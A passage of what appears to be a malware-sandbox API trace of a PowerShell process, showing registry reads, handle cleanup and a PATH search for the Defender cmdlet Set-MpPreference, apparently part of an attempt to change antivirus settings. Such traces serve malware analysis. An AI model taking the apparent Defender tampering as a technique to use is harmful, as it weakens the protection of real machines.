(hEvent=0x38c) returned 1 [0156.053] GetLastError () returned 0xcb [0156.053] SetEvent (hEvent=0x3b0) returned 1 [0156.053] GetLastError () returned 0xcb [0156.054] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.054] GetLastError () returned 0xcb [0156.055] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e770 | out: phkResult=0x23e770*=0x360) returned 0x0 [0156.055] RegQueryValueExW (in: hKey=0x360, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x23e7b8, lpData=0x0, lpcbData=0x23e7b4*=0x0 | out: lpType=0x23e7b8*=0x0, lpData=0x0, lpcbData=0x23e7b4*=0x0) returned 0x2 [0161.115] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x388 [0161.115] GetLastError () returned 0x0 [0161.115] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c0 [0161.115] GetLastError () returned 0x0 [0161.115] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c4 [0161.115] GetLastError () returned 0x0 [0161.115] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320 [0161.115] GetLastError () returned 0x0 [0161.115] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x390 [0161.115] GetLastError () returned 0x0 [0161.115] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x394 [0161.115] GetLastError () returned 0x0 [0161.115] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x398 [0161.115] GetLastError () returned 0x0 [0161.115] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ac [0161.115] GetLastError () returned 0x0 [0161.115] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d0 [0161.115] GetLastError () returned 0x0 [0161.116] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3d4 [0161.116] GetLastError () returned 0x0 [0161.116] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d8 [0161.116] GetLastError () returned 0x0 [0161.116] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3dc [0161.116] GetLastError () returned 0x0 [0161.116] SetEvent (hEvent=0x320) returned 1 [0161.116] GetLastError () returned 0x0 [0161.116] SetEvent (hEvent=0x388) returned 1 [0161.116] GetLastError () returned 0x0 [0161.116] SetEvent (hEvent=0x3c0) returned 1 [0161.116] GetLastError () returned 0x0 [0161.116] SetEvent (hEvent=0x3c4) returned 1 [0161.116] GetLastError () returned 0x0 [0161.116] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e0 [0161.116] GetLastError () returned 0x0 [0161.116] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x23e7a4 | out: phkResult=0x23e7a4*=0x3e4) returned 0x0 [0161.116] RegQueryValueExW (in: hKey=0x3e4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x23e7ec, lpData=0x0, lpcbData=0x23e7e8*=0x0 | out: lpType=0x23e7ec*=0x0, lpData=0x0, lpcbData=0x23e7e8*=0x0) returned 0x2 [0161.261] SetEvent (hEvent=0x390) returned 1 [0161.261] GetLastError () returned 0x0 [0161.261] SetEvent (hEvent=0x394) returned 1 [0161.261] GetLastError () returned 0x0 [0161.261] SetEvent (hEvent=0x398) returned 1 [0161.261] GetLastError () returned 0x0 [0161.316] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x357e88, nSize=0x80 | out: lpBuffer="") returned 0x0 [0161.316] GetLastError () returned 0xcb [0161.325] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x348b88, nSize=0x23e880 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x23e880) returned 0x1 [0161.325] GetLastError () returned 0xcb [0161.325] GetUserNameW (in: lpBuffer=0x357e88, pcbBuffer=0x23e888 | out: lpBuffer="aETAdzjz", pcbBuffer=0x23e888) returned 1 [0161.327] ReportEventW (hEventLog=0x4e90004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2be3478*="Stopped", lpRawData=0x2be3334) returned 1 [0161.339] GetLastError () returned 0x0 [0161.339] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0161.339] GetLastError () returned 0x0 [0161.341] CoGetContextToken (in: pToken=0x23f5b8 | out: pToken=0x23f5b8) returned 0x0 [0161.341] CObjectContext::QueryInterface () returned 0x0 [0161.341] CObjectContext::GetCurrentThreadType () returned 0x0 [0161.341] Release () returned 0x0 [0161.343] CoGetContextToken (in: pToken=0x23f390 | out: pToken=0x23f390) returned 0x0 [0161.343] CObjectContext::QueryInterface () returned 0x0 [0161.343] CObjectContext::GetCurrentThreadType () returned 0x0 [0161.343] Release () returned 0x0 [0161.345] CoGetContextToken (in: pToken=0x23f390 | out: pToken=0x23f390) returned 0x0 [0161.345] CObjectContext::QueryInterface () returned 0x0 [0161.345] CObjectContext::GetCurrentThreadType () returned 0x0 [0161.345] Release () returned 0x0 [0161.353] CoGetContextToken (in: pToken=0x23f390 | out: pToken=0x23f390) returned 0x0 [0161.353] CObjectContext::QueryInterface () returned 0x0 [0161.353] CObjectContext::GetCurrentThreadType () returned 0x0 [0161.353] Release () returned 0x0 [0161.458] CoGetContextToken (in: pToken=0x23f370 | out: pToken=0x23f370) returned 0x0 [0161.458] CObjectContext::QueryInterface () returned 0x0 [0161.458] CObjectContext::GetCurrentThreadType () returned 0x0 [0161.458] Release () returned 0x0 [0161.459] CoUninitialize () Thread: id = 157 os_tid = 0x9cc Thread: id = 158 os_tid = 0x9a8 Thread: id = 159 os_tid = 0x998 Thread: id = 160 os_tid = 0x9a4 Thread: id = 161 os_tid = 0xa94 [0141.963] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0150.597] LocalFree (hMem=0x3047d8) returned 0x0 [0150.598] GetLastError () returned 0x0 [0150.598] CloseHandle (hObject=0x340) returned 1 [0150.598] GetLastError () returned 0x0 [0150.598] CloseHandle (hObject=0x13) returned 1 [0150.598] GetLastError () returned 0x0 [0150.598] CloseHandle (hObject=0xf) returned 1 [0150.599] GetLastError () returned 0x0 [0150.599] RegCloseKey (hKey=0x324) returned 0x0 [0150.599] RegCloseKey (hKey=0x320) returned 0x0 [0150.599] RegCloseKey (hKey=0x31c) returned 0x0 [0150.599] LocalFree (hMem=0x304828) returned 0x0 [0150.599] GetLastError () returned 0x0 [0150.599] RegCloseKey (hKey=0x34c) returned 0x0 [0151.942] RegCloseKey (hKey=0x34c) returned 0x0 [0154.057] RegCloseKey (hKey=0x398) returned 0x0 [0154.057] RegCloseKey (hKey=0x394) returned 0x0 [0154.057] RegCloseKey (hKey=0x390) returned 0x0 [0154.057] RegCloseKey (hKey=0x320) returned 0x0 [0154.057] RegCloseKey (hKey=0x3c4) returned 0x0 [0154.058] RegCloseKey (hKey=0x3c0) returned 0x0 [0154.058] RegCloseKey (hKey=0x388) returned 0x0 [0154.058] RegCloseKey (hKey=0x384) returned 0x0 [0154.058] RegCloseKey (hKey=0x380) returned 0x0 [0154.059] RegCloseKey (hKey=0x37c) returned 0x0 [0154.059] RegCloseKey (hKey=0x378) returned 0x0 [0154.059] RegCloseKey (hKey=0x374) returned 0x0 [0154.059] RegCloseKey (hKey=0x370) returned 0x0 [0154.060] RegCloseKey (hKey=0x36c) returned 0x0 [0154.060] RegCloseKey (hKey=0x3bc) returned 0x0 [0154.060] RegCloseKey (hKey=0x364) returned 0x0 [0154.060] RegCloseKey (hKey=0x360) returned 0x0 [0154.061] RegCloseKey (hKey=0x35c) returned 0x0 [0154.061] RegCloseKey (hKey=0x358) returned 0x0 [0154.061] RegCloseKey (hKey=0x354) returned 0x0 [0154.061] RegCloseKey (hKey=0x350) returned 0x0 [0154.061] RegCloseKey (hKey=0x340) returned 0x0 [0154.062] RegCloseKey (hKey=0x324) returned 0x0 [0154.062] RegCloseKey (hKey=0x3b8) returned 0x0 [0154.062] RegCloseKey (hKey=0x31c) returned 0x0 [0154.062] RegCloseKey (hKey=0x34c) returned 0x0 [0154.062] RegCloseKey (hKey=0x3b4) returned 0x0 [0154.063] RegCloseKey (hKey=0x3b0) returned 0x0 [0154.063] RegCloseKey (hKey=0x38c) returned 0x0 [0154.063] RegCloseKey (hKey=0x3c8) returned 0x0 [0154.063] RegCloseKey (hKey=0x3a8) returned 0x0 [0154.064] RegCloseKey (hKey=0x3a4) returned 0x0 [0154.064] RegCloseKey (hKey=0x3a0) returned 0x0 [0154.064] RegCloseKey (hKey=0x39c) returned 0x0 [0156.573] RegCloseKey (hKey=0x360) returned 0x0 [0161.344] GetLastError () returned 0x0 [0161.344] GetLastError () returned 0x0 [0161.344] LocalFree (hMem=0x368e78) returned 0x0 [0161.344] GetLastError () returned 0x0 [0161.345] GetLastError () returned 0x0 [0161.345] GetLastError () returned 0x0 [0161.345] LocalFree (hMem=0x368df0) returned 0x0 [0161.345] GetLastError () returned 0x0 [0161.352] DeregisterEventSource (hEventLog=0x4e90004) returned 1 [0161.410] GetLastError () returned 0x0 [0161.422] CloseHandle (hObject=0x3d4) returned 1 [0161.422] GetLastError () returned 0x0 [0161.422] CloseHandle (hObject=0x3d0) returned 1 [0161.422] GetLastError () returned 0x0 [0161.422] CloseHandle (hObject=0x3ac) returned 1 [0161.422] GetLastError () returned 0x0 [0161.423] CloseHandle (hObject=0x398) returned 1 [0161.423] GetLastError () returned 0x0 [0161.423] CloseHandle (hObject=0x394) returned 1 [0161.423] GetLastError () returned 0x0 [0161.423] CloseHandle (hObject=0x390) returned 1 [0161.423] GetLastError () returned 0x0 [0161.423] CloseHandle (hObject=0x320) returned 1 [0161.423] GetLastError () returned 0x0 [0161.423] CloseHandle (hObject=0x3c4) returned 1 [0161.423] GetLastError () returned 0x0 [0161.424] CloseHandle (hObject=0x3c0) returned 1 [0161.424] GetLastError () returned 0x0 [0161.424] CloseHandle (hObject=0x388) returned 1 [0161.424] GetLastError () returned 0x0 [0161.424] CloseHandle (hObject=0xf) returned 1 [0161.429] GetLastError () returned 0x0 [0161.430] CloseHandle (hObject=0x7f) returned 1 [0161.433] GetLastError () returned 0x0 [0161.433] CloseHandle (hObject=0x7b) returned 1 [0161.434] GetLastError () returned 0x0 [0161.434] CloseHandle (hObject=0x77) returned 1 [0161.434] GetLastError () returned 0x0 [0161.434] CloseHandle (hObject=0x73) returned 1 [0161.435] GetLastError () returned 0x0 [0161.435] CloseHandle (hObject=0x6f) returned 1 [0161.435] GetLastError () returned 0x0 [0161.435] CloseHandle (hObject=0x6b) returned 1 [0161.436] GetLastError () returned 0x0 [0161.436] CloseHandle (hObject=0x67) returned 1 [0161.436] GetLastError () returned 0x0 [0161.436] CloseHandle (hObject=0x63) returned 1 [0161.437] GetLastError () returned 0x0 [0161.437] CloseHandle (hObject=0x5f) returned 1 [0161.437] GetLastError () returned 0x0 [0161.437] CloseHandle (hObject=0x5b) returned 1 [0161.438] GetLastError () returned 0x0 [0161.438] CloseHandle (hObject=0x57) returned 1 [0161.438] GetLastError () returned 0x0 [0161.438] CloseHandle (hObject=0x53) returned 1 [0161.439] GetLastError () returned 0x0 [0161.442] CloseHandle (hObject=0x4f) returned 1 [0161.443] GetLastError () returned 0x0 [0161.443] CloseHandle (hObject=0x4b) returned 1 [0161.443] GetLastError () returned 0x0 [0161.443] CloseHandle (hObject=0x47) returned 1 [0161.443] GetLastError () returned 0x0 [0161.444] CloseHandle (hObject=0x358) returned 1 [0161.444] GetLastError () returned 0x0 [0161.444] CloseHandle (hObject=0x354) returned 1 [0161.444] GetLastError () returned 0x0 [0161.444] CloseHandle (hObject=0x350) returned 1 [0161.444] GetLastError () returned 0x0 [0161.444] CloseHandle (hObject=0x340) returned 1 [0161.444] GetLastError () returned 0x0 [0161.444] CloseHandle (hObject=0x324) returned 1 [0161.444] GetLastError () returned 0x0 [0161.445] CloseHandle (hObject=0x3b8) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] CloseHandle (hObject=0x31c) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] CloseHandle (hObject=0x34c) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] CloseHandle (hObject=0x3b4) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] CloseHandle (hObject=0x3b0) returned 1 [0161.445] GetLastError () returned 0x0 [0161.445] CloseHandle (hObject=0x38c) returned 1 [0161.446] GetLastError () returned 0x0 [0161.446] CloseHandle (hObject=0x3c8) returned 1 [0161.446] GetLastError () returned 0x0 [0161.446] CloseHandle (hObject=0x43) returned 1 [0161.446] GetLastError () returned 0x0 [0161.446] CloseHandle (hObject=0x3f) returned 1 [0161.446] GetLastError () returned 0x0 [0161.447] CloseHandle (hObject=0x3b) returned 1 [0161.447] GetLastError () returned 0x0 [0161.447] CloseHandle (hObject=0x37) returned 1 [0161.447] GetLastError () returned 0x0 [0161.448] CloseHandle (hObject=0x33) returned 1 [0161.448] GetLastError () returned 0x0 [0161.448] CloseHandle (hObject=0x2f) returned 1 [0161.448] GetLastError () returned 0x0 [0161.448] CloseHandle (hObject=0x2b) returned 1 [0161.449] GetLastError () returned 0x0 [0161.449] CloseHandle (hObject=0x27) returned 1 [0161.449] GetLastError () returned 0x0 [0161.449] CloseHandle (hObject=0x23) returned 1 [0161.449] GetLastError () returned 0x0 [0161.449] CloseHandle (hObject=0x1f) returned 1 [0161.451] GetLastError () returned 0x0 [0161.451] CloseHandle (hObject=0x35c) returned 1 [0161.451] GetLastError () returned 0x0 [0161.451] CloseHandle (hObject=0x1b) returned 1 [0161.452] GetLastError () returned 0x0 [0161.452] CloseHandle (hObject=0x17) returned 1 [0161.453] GetLastError () returned 0x0 [0161.453] CloseHandle (hObject=0x13) returned 1 [0161.453] GetLastError () returned 0x0 [0161.453] CloseHandle (hObject=0x338) returned 1 [0161.453] GetLastError () returned 0x0 [0161.454] RegCloseKey (hKey=0x3e4) returned 0x0 [0161.454] UnmapViewOfFile (lpBaseAddress=0x2840000) returned 1 [0161.454] CloseHandle (hObject=0x348) returned 1 [0161.454] GetLastError () returned 0x0 [0161.455] RegCloseKey (hKey=0x80000004) returned 0x0 [0161.455] CloseHandle (hObject=0x304) returned 1 [0161.455] GetLastError () returned 0x0 [0161.455] CloseHandle (hObject=0x3e0) returned 1 [0161.455] GetLastError () returned 0x0 [0161.455] CloseHandle (hObject=0x3dc) returned 1 [0161.455] GetLastError () returned 0x0 [0161.456] CloseHandle (hObject=0x3d8) returned 1 [0161.456] GetLastError () returned 0x0 Thread: id = 200 os_tid = 0x7e4 [0156.073] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0156.100] SetThreadUILanguage (LangId=0x0) returned 0x409 [0156.110] VirtualQuery (in: lpAddress=0x5dce0e0, lpBuffer=0x5dcf0e0, dwLength=0x1c | out: lpBuffer=0x5dcf0e0*(BaseAddress=0x5dce000, AllocationBase=0x5440000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.136] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.136] GetLastError () returned 0xcb [0156.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.139] GetLastError () returned 0xcb [0156.141] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.141] GetLastError () returned 0xcb [0156.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.164] GetLastError () returned 0xcb [0156.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.186] GetLastError () returned 0xcb [0156.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.187] GetLastError () returned 0xcb [0156.225] VirtualQuery (in: lpAddress=0x5dce1fc, lpBuffer=0x5dcf1fc, dwLength=0x1c | out: lpBuffer=0x5dcf1fc*(BaseAddress=0x5dce000, AllocationBase=0x5440000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0156.226] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.226] GetLastError () returned 0xcb [0156.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.229] GetLastError () returned 0xcb [0156.229] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.229] GetLastError () returned 0xcb [0156.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.266] GetLastError () returned 0xcb [0156.321] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.321] GetLastError () returned 0xcb [0156.436] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.436] GetLastError () returned 0xcb [0156.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.438] GetLastError () returned 0xcb [0156.439] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.439] GetLastError () returned 0xcb [0156.441] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.441] GetLastError () returned 0xcb [0156.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.443] GetLastError () returned 0xcb [0156.444] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.444] GetLastError () returned 0xcb [0156.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.445] GetLastError () returned 0xcb [0156.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34b720, nSize=0x80 | out: lpBuffer="") returned 0x0 [0156.518] GetLastError () returned 0xcb [0156.635] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0156.635] GetLastError () returned 0xcb [0156.641] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x34b778, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0156.641] GetLastError () returned 0xcb [0156.667] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3d1f40 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.667] GetLastError () returned 0xcb [0156.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.688] GetLastError () returned 0xcb [0156.689] SetErrorMode (uMode=0x1) returned 0x1 [0156.691] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.ps1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.692] GetLastError () returned 0x2 [0156.692] SetErrorMode (uMode=0x1) returned 0x1 [0156.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.694] GetLastError () returned 0x2 [0156.694] SetErrorMode (uMode=0x1) returned 0x1 [0156.694] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psm1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.694] GetLastError () returned 0x2 [0156.694] SetErrorMode (uMode=0x1) returned 0x1 [0156.694] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.694] GetLastError () returned 0x2 [0156.694] SetErrorMode (uMode=0x1) returned 0x1 [0156.694] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.psd1", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.694] GetLastError () returned 0x2 [0156.695] SetErrorMode (uMode=0x1) returned 0x1 [0156.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.695] GetLastError () returned 0x2 [0156.695] SetErrorMode (uMode=0x1) returned 0x1 [0156.695] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.COM", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.695] GetLastError () returned 0x2 [0156.695] SetErrorMode (uMode=0x1) returned 0x1 [0156.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.695] GetLastError () returned 0x2 [0156.695] SetErrorMode (uMode=0x1) returned 0x1 [0156.695] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.EXE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.695] GetLastError () returned 0x2 [0156.696] SetErrorMode (uMode=0x1) returned 0x1 [0156.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.696] GetLastError () returned 0x2 [0156.696] SetErrorMode (uMode=0x1) returned 0x1 [0156.696] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.BAT", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.696] GetLastError () returned 0x2 [0156.696] SetErrorMode (uMode=0x1) returned 0x1 [0156.696] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.696] GetLastError () returned 0x2 [0156.696] SetErrorMode (uMode=0x1) returned 0x1 [0156.696] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.CMD", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.697] GetLastError () returned 0x2 [0156.697] SetErrorMode (uMode=0x1) returned 0x1 [0156.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.697] GetLastError () returned 0x2 [0156.697] SetErrorMode (uMode=0x1) returned 0x1 [0156.697] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBS", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.697] GetLastError () returned 0x2 [0156.697] SetErrorMode (uMode=0x1) returned 0x1 [0156.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.697] GetLastError () returned 0x2 [0156.697] SetErrorMode (uMode=0x1) returned 0x1 [0156.697] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.VBE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.697] GetLastError () returned 0x2 [0156.698] SetErrorMode (uMode=0x1) returned 0x1 [0156.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.698] GetLastError () returned 0x2 [0156.698] SetErrorMode (uMode=0x1) returned 0x1 [0156.698] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JS", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.698] GetLastError () returned 0x2 [0156.698] SetErrorMode (uMode=0x1) returned 0x1 [0156.698] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.698] GetLastError () returned 0x2 [0156.698] SetErrorMode (uMode=0x1) returned 0x1 [0156.698] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.JSE", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.698] GetLastError () returned 0x2 [0156.698] SetErrorMode (uMode=0x1) returned 0x1 [0156.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.699] GetLastError () returned 0x2 [0156.699] SetErrorMode (uMode=0x1) returned 0x1 [0156.699] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSF", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.699] GetLastError () returned 0x2 [0156.699] SetErrorMode (uMode=0x1) returned 0x1 [0156.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.699] GetLastError () returned 0x2 [0156.699] SetErrorMode (uMode=0x1) returned 0x1 [0156.699] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.WSH", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.699] GetLastError () returned 0x2 [0156.699] SetErrorMode (uMode=0x1) returned 0x1 [0156.699] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.700] GetLastError () returned 0x2 [0156.700] SetErrorMode (uMode=0x1) returned 0x1 [0156.700] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference.MSC", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.700] GetLastError () returned 0x2 [0156.700] SetErrorMode (uMode=0x1) returned 0x1 [0156.700] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0156.700] GetLastError () returned 0x2 [0156.700] SetErrorMode (uMode=0x1) returned 0x1 [0156.700] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Set-MpPreference", lpFindFileData=0x3d1f40 | out: lpFindFileData=0x3d1f40) returned 0xffffffff [0156.700] GetLastError () returned 0x2 [0156.700] SetErrorMode (uMode=0x1) returned 0x1 [0156.703] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5dce840, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0156.703] GetLastError () returned 0x2 [0156.703] SetErrorMode (uMode=0x1) returned 0x1 [0156.703] FindFirstFileW (in: lpFileName="C:\\Windows\\Set-MpPreference.ps1", lpFindFileData=0x3d1f40 | out: 